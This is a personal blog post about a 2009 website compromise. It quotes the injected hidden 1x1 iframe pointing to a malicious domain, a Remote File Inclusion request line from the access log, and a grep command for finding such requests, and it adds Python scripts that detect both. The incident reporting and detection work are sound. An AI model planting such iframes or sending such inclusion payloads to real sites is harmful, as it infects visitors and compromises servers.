Fruggums

thoughts and thinkings by azhar chougle 

What just happened?

I woke up today to a complete nightmare. All of my websites were 'infected'. They were tagged by Google as malicious (and they were right this time). I had no idea what was going on. Google said the usual ("this site may harm your computer", etc.) and then tied all my sites to this domain: 'litetopfindworld.cn'.

Of course my first reaction was to blame my host, Media Temple, and assume I'd been hacked or something of the sort. 

After sending a few angry messages to them (sorry about that), seems they had nothing to do with it. Essentially, it was my fault (sorry again). Of course, I had no idea what the source was, what it was doing, or how to rectify it.

Note this is at 10AM, and I have a class at noon, so I was pretty tense.

Eventually I found this: http://google.com/safebrowsing/diagnostic?tpl=safari&site=litetopfindworld.cn&hl=en-us which unfortunately means that anyone who visited any of the sites hosted on my server may have been infected with up to 212 trojans (I say *may* because I can't be sure - read further down the page I just linked to). Please run Ad-Aware or something of the sort. I sincerely apologize for this, but as you will find out it isn't completely my fault (but you can blame me anyway). Again, any anti-spyware program should do it. If you had an anti-virus running in the background, you should be alright, but do scan anyway. Mac users, you're fine, but if you're concerned go ahead and run MacScan.

So it seems this malicious code (do not visit the site below):

<iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>

was being added next to the <body> tag on all my pages. Essentially it was secretly loading a malicious webpage, which you wouldn't know about unless you looked at the code, or Google stopped you (if you are logged in to your Google account while browsing, it automatically does, by default).

I managed to remove the line of code from all my sites manually. However, it kept reappearing on my blog. 
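Removing the line by hand across every page is exactly the kind of job that misses a file. The following is an added example, my own Python code and not anything from the post or from Media Temple, that scans HTML/PHP files for frames like the one above. It treats a frame as injected when at least two of three indicators apply: it is 1x1 pixels, it is hidden with CSS (the post's `visibility: hidden`, and `display: none` as well, which generalizes the post's case), or its `src` points at a host you have not whitelisted. The sample page, the `trusted_hosts` parameter and the file extensions scanned are assumptions of this example.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not from the blog): a normal page into which the
# 1x1 hidden iframe described in the post has been injected right after <body>.
# The injected line reuses the domain the post names; everything else is made up.
SAMPLE_PAGE = """<html><head><title>The Daily Sunrise</title></head>
<body><iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>
<h1>Welcome</h1>
<p>A legitimate embed, large and visible, which should not be flagged:</p>
<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lower-cases tag names
            self.iframes.append({name.lower(): (value or "") for name, value in attrs})


def _pixels(value):
    """Leading integer of a width/height attribute ('1', '1px', ' 560 '), or None."""
    match = re.match(r"\s*(\d+)", value)
    return int(match.group(1)) if match else None


def suspicious_iframes(html, trusted_hosts=()):
    """Return [(src, [reasons])] for iframes that look like a drive-by injection.

    A frame is reported when at least two indicators apply: it is at most 1x1
    pixels, it is hidden with CSS, or it points at a host not in trusted_hosts.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = []
        width, height = _pixels(attrs.get("width", "")), _pixels(attrs.get("height", ""))
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("1x1 pixel frame")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via CSS")
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        if host and host not in trusted_hosts:
            reasons.append("off-site source " + host)
        if len(reasons) >= 2:
            findings.append((src, reasons))
    return findings


def scan_tree(root, extensions=(".html", ".htm", ".php"), trusted_hosts=()):
    """Walk a web root and return {path: findings} for every file that has a hit."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = suspicious_iframes(fh.read(), trusted_hosts)
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE):
        print(src, "->", ", ".join(reasons))
```

Run `scan_tree("/path/to/webroot", trusted_hosts=("www.youtube.com",))` from the account that owns the files; any path it returns is one to clean and, just as important, to re-check the next day, since the post shows the line coming back on its own.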

At which point Media Temple's support staff asked me to SSH in and use this command to search the access logs for scripts that may have been attacked using a method called Remote File Inclusion.

grep "?*=http://" ../../logs/access_log* | awk '/Jan/ && /libww/ && $9 !~ /^4/'

which returned:

../../logs/access_log-2009-01-30-12.processed:72.47.202.35 - - [30/Jan/2009:12:17:41 -0800] "GET /thedailysunrise.com/?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 37091 "-" "libwww-perl/5.79"

... and I didn't really know what it meant. So I asked, and it turns out the source was my index.php file on thedailysunrise.com. There are two scripts on that page which could have been targeted for such an attack. One was Text-Link-Ads and the other was my stats tracking, which was done by SlimStat.
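What that grep/awk pipeline is really asking is: which requests carried a full URL as a query-string value, came from a scripted client, and were not refused? The following is an added example, my own Python code rather than anything from the post or from Media Temple, that parses Apache combined-format lines and answers the same question. It differs from the awk filter in one deliberate way: 4xx responses are kept and marked `served=False`, because a blocked probe still tells you who is scanning and which parameter they are trying. The sample log is constructed; its first line is the one the post shows (including the filename prefix grep prints), and the other two are made up for contrast.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample of Apache combined-format log lines (not a real log). The
# first line is the one the post shows, including the filename prefix that grep
# puts in front of matches; the other two are made up for contrast: a normal
# page view, and an RFI probe that the server refused with a 404.
SAMPLE_LOG = """\
../../logs/access_log-2009-01-30-12.processed:72.47.202.35 - - [30/Jan/2009:12:17:41 -0800] "GET /thedailysunrise.com/?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 37091 "-" "libwww-perl/5.79"
192.0.2.10 - - [30/Jan/2009:12:18:02 -0800] "GET /thedailysunrise.com/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [30/Jan/2009:12:19:45 -0800] "GET /blog/?inc=http://198.51.100.5/shell.txt HTTP/1.1" 404 812 "-" "libwww-perl/5.805"
"""

# Optional "filename:" prefix (as grep prints it), then the combined log fields:
# client host, identd, user, [timestamp], "METHOD target PROTO", status, size,
# "referer", "user agent".
LOG_RE = re.compile(
    r'^(?:[^\s:]+:)?(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# A query-string value starting with one of these is a remote include attempt.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Split one log line into its fields, or return None if it is not a log line."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_rfi_attempts(lines):
    """Return one record per request whose query string carries a remote URL.

    Unlike the awk filter in the post, 4xx responses are kept but marked
    served=False, so blocked probes still show who is scanning and for what.
    """
    attempts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        # Split the request target on the first '?' ourselves rather than with
        # urlsplit, since attack targets often contain brackets and stray '?'.
        _, _, query = entry["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                attempts.append({
                    "host": entry["host"],
                    "time": entry["time"],
                    "param": name,
                    "remote_url": value,
                    "status": entry["status"],
                    "served": not entry["status"].startswith("4"),
                    "script_client": "libwww-perl" in entry["agent"].lower(),
                })
    return attempts


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG.splitlines()):
        flag = "SERVED" if hit["served"] else "blocked"
        print(f'{hit["host"]} {flag} {hit["param"]}={hit["remote_url"]}')
```

On a real server you would feed it `open(path)` for each rotated log instead of `SAMPLE_LOG.splitlines()`. The `param` field is the useful output: it names the variable the attacker is trying to point at a remote file, which is what tells you which script on the page to look at.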

If it was TLA, I would have received an e-mail to update my code. Thousands of people use it, and a vulnerability would spread fast and someone would say something. So it had to be SlimStat. I'm not exactly sure how it all worked, but the line of code that was on all my pages to include SlimStat's function was compromised, and it was injecting that iframe on all my pages, rendering all my websites dangerous.

So I got rid of SlimStat.

And now everything seems to be fine. Again, sorry to everyone affected, and Media Temple, for doubting them (again).

Time to ante up my SSH skills.


Comments (2)

Feb 06, 2009
I actually don't think this is a WP problem only. I had the same issue on one site, but when I grep'd my home directory I found this link injection on a bunch of files. Some were WP, some were Gallery, and some were html files I made by hand. The only thing they had in common? They all were index.<something>, either php or html. I have alerted my hosting company to see if they can find how it happened.
Feb 06, 2009
Azhar Chougle said...
It isn't a WP problem at all, as I'm on Blogger. Yeah, it did infect all the files on my server. You've gotta find a PHP include function that is prone to being exploited. Your hosting company can definitely help you out though. (mt) took a little convincing, because they're not responsible if one of the scripts I installed isn't secure and gets hacked, but after convincing them for a while they gave in and started helping.
